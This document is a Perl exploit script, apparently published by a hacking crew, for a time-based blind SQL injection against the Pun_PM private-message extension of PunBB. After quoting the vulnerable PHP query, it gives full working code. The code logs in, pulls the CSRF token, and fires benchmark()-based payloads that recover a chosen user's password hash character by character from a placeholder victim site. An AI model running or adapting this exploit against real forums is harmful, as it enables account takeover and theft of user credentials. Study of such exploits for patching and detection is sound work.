#!/usr/bin/perl # [0-Day] PunBB <= 1.3.* Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit # Author/s: Dante90, WaRWolFz Crew # Created: 2009.07.30 after 0 days the bug was discovered. # Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, Shades Master, The:Paradox, V1R5, yeat # Greetings To: _ nEmO _, XaDoS, Necrofiend, Lutor, vagabondo, hacku, yawn, The_Exploited, Shotokan-The Hacker, _mRkZ_, # Chuzz, init, plucky, SaRtE, Lupo # Thanks For Testing: BlAcK HaT, l3d # Web Site: www.warwolfz.org # My Wagend (Dante90): dante90wwz.altervista.org # Unit-X Project: www.unitx.net # ---- # Why I've decided to publish this? # Because in "Package: Pun_PM <= v1.2.9" the bug was fixed. # ---- # DETAILS # ./PunBB v1.3.*/extensions/pun_pm/functions.php # LINES: 504 -> 526 # function pun_pm_edit_message() # { # global $forum_db, $forum_user, $lang_pun_pm; # # $errors = array(); # # // Verify input data # $query = array( # 'SELECT' => 'm.id as id, m.sender_id as sender_id, m.status as status, u.username as username, m.subject as subject, m.body as body', # 'FROM' => 'pun_pm_messages m', # 'JOINS' => array( # array( # 'LEFT JOIN' => 'users AS u', # 'ON' => '(u.id = m.receiver_id)' # ), # ), # 'WHERE' => 'm.id = '.$forum_db->escape($_GET['message_id']).' AND m.sender_id = '.$forum_user['id'].' AND m.deleted_by_sender = 0' # ); # # ($hook = get_hook('pun_pm_fn_edit_message_pre_validate_query')) ? eval($hook) : null; # # $result = $forum_db->query_build($query) or error(__FILE__, __LINE__); # ---- # GET http://127.0.0.1/WaRWolFz/misc.php?section=pun_pm&pmpage=write&message_id=-1' # Error - PunBB # An error was encountered # The error occurred on line 525 in ./WaRWolFz/extensions/pun_pm/functions.php # Database reported: Errore di sintassi nella query SQL vicino a '\ AND m.sender_id = 2 AND m.deleted_by_sender = 0' linea 1 (Errno: 1064). use strict; use warnings; use LWP::UserAgent; use HTTP::Cookies; use HTTP::Request::Common; use Time::HiRes; use IO::Socket; my ($UserName,$PassWord,$ID) = @ARGV; if (@ARGV < 3) { &usage(); exit(); } my $Message = ""; my $Hash = ""; my ($Time,$Time_Start,$Time_End,$Response); my ($Start,$End); my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link my $Method = HTTP::Request->new(GET => $Host); my $Cookies = new HTTP::Cookies; my $HTTP = new LWP::UserAgent( agent => 'Mozilla/5.0', max_redirect => 0, cookie_jar => $Cookies, ) or die $!; my $Referrer = "http://www.warwolfz.org/"; my $DefaultTime = request($Referrer); sub request { $Referrer = $_[0]; $Method->referrer($Referrer); $Start = Time::HiRes::time(); $Response = $HTTP->request($Method); $Response->is_success() or die "$Host : ", $Response->message,"\n"; $End = Time::HiRes::time(); $Time = $End - $Start; return $Time; } sub Blind_SQL_Jnjection { my ($dec,$hex) = @_; return "./misc.php?section=pun_pm&pmpage=write&message_id=-1 OR 1!=(SELECT IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0) FROM `users` WHERE `id`=${ID})--"; } sub Clear() { my $launch = $^O eq 'MSWin32' ? 'cls' : 'clear'; return system($launch); } sub Login() { if ($ARGV[4] =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}?$/) { $Cookies->proxy(['http', 'ftp'], 'http://'.$ARGV[4]) or die $!; } my $Get = $HTTP->get($Host.'login.php'); my $csrf_token = ""; if ($Get->content =~ /type="hidden" name="csrf_token" value="([a-f0-9]{1,40})/i) { #ByPassing csrf_token hidden input $csrf_token = $1; } my $Login = $HTTP->post($Host.'login.php', [ form_sent => '1', redirect_url => $Host.'login.php', csrf_token => $csrf_token, req_username => $UserName, req_password => $PassWord, save_pass => '1', login => 'Login', ]) || die $!; if ($Login->content =~ /Verrai trasferito automaticamente ad una nuova pagina in 1 secondo/i) { #English Language: You should automatically be forwarded to a new page in 1 second. return 1; } else { return 0; } } sub usage { Clear(); { print " \n [0-Day] PunBB <= 1.3.4 Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit\n"; print " ------------------------------------------------------ \n"; print " * USAGE: *\n"; print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n"; print " * perl name_exploit.pl [username] [password] [id] *\n"; print " * [proxy] is optional (ex: 151.57.4.97:8080) *\n"; print " ------------------------------------------------------ \n"; print " * Powered By Dante90, WaRWolFz Crew *\n"; print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n"; print " ------------------------------------------------------ \n"; }; exit; } sub refresh { Clear(); { print " \n [0-Day] PunBB <= 1.3.4 Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit\n"; print " ------------------------------------------------------ \n"; print " * USAGE: *\n"; print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n"; print " * perl name_exploit.pl [username] [password] [id] *\n"; print " * [proxy] is optional (ex: 151.57.4.97:8080) *\n"; print " ------------------------------------------------------ \n"; print " * Powered By Dante90, WaRWolFz Crew *\n"; print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n"; print " ------------------------------------------------------ \n"; }; print $_[0] ."\n"; print " * Victime Site: " . $_[1] . "\n"; print " * Default Time: " . $_[2] . " seconds\n"; print " * BruteForcing Hash: " . chr($chars[$_[3]]) . "\n"; print " * BruteForcing N Char Hash: " . $_[6] . "\n"; print " * SQL Time: " . $_[5] . " seconds\n"; print " * Hash: " . $_[4] . "\n"; } sub Main(){ if (Login() == 1) { $Message = " * Logged in as: ".$UserName; } elsif (Login() == 0) { $Message = " * Login Failed."; refresh($Message, $Host, $DefaultTime, "0", $Hash, $Time, "1"); print " * Exploit Failed *\n"; print " ------------------------------------------------------ \n"; exit; } for (my $I=1; $I<=40; $I++) { #N Hash characters for (my $J=0; $J<=15; $J++) { #0 -> F $Time_Start = time(); my $Get1 = $HTTP->get($Host.Blind_SQL_Jnjection($I,$chars[$J])); $Time_End = time(); $Time = request($Referrer); refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I); if ($Time_End - $Time_Start > 6) { $Time = request($Referrer); refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I); if ($Time_End - $Time_Start > 6) { syswrite(STDOUT,chr($chars[$J])); $Hash .= chr($chars[$J]); $Time = request($Referrer); refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I); last; } } } if ($I == 1 && length $Hash < 1 && !$Hash) { print " * Exploit Failed *\n"; print " ------------------------------------------------------ \n"; exit; } if ($I == 40) { print " * Exploit Successfully Executed *\n"; print " ------------------------------------------------------\n "; system("pause"); } } } Main(); #WaRWolFz Crew